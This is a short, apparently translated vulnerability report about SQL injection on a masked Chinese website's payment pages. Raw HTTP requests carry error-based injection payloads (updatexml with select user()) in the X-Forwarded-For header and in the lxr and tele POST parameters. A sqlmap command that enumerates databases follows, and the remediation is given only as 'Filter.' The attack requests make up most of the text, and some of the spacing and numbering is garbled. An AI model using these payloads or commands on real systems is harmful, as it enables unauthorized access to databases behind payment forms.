Alexa: Top 3 SQL injection sites in China
SQL Injection
1. Change X-Forwarded-For **. ** '.
GET / HTTP/1.1Host: **.**.**.**User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateCookie: checkdom=**.**.**.**%7C**.**.**.**X-Forwarded-For: **.**.**.**',(updatexml(1,concat(0x3a,(select user())),1)))#Connection: keep-aliveCache-Control: max-age=0
2 3.
POST/alipay_to.php HTTP/1.1
Host: **.**.**.**User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: http://**.**.**.**/pay.phpCookie: checkdom=**.**.**.**%7C**.**.**.**X-Forwarded-For: **.**.**.**'"sdfsdf1%df1%df22%#\Connection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 133named=**.**.**.**%E7%9B%B8%E5%85%B3%E8%B4%B9%E7%94%A8&jiner=12&lxr=1&tele=1',(updatexml(1,concat(0x3a,(select user())),1)) or '','','')#
The parameters are lxr and tele respectively.
Lxr = 1', (updatexml (1, concat (0x3a, (select user (), 1) or '','','','') # & tele = 1 next injection
Attach Database
C: \ Python27 \ sqlmap1 \ burpsuite> sqlmap. py-r C: \ Users \ lcy \ AppData \ Local \ Temp \ 1448
439173492. req -- dbms = "mysql" -- level 3 -- dbs
Solution:
Filter.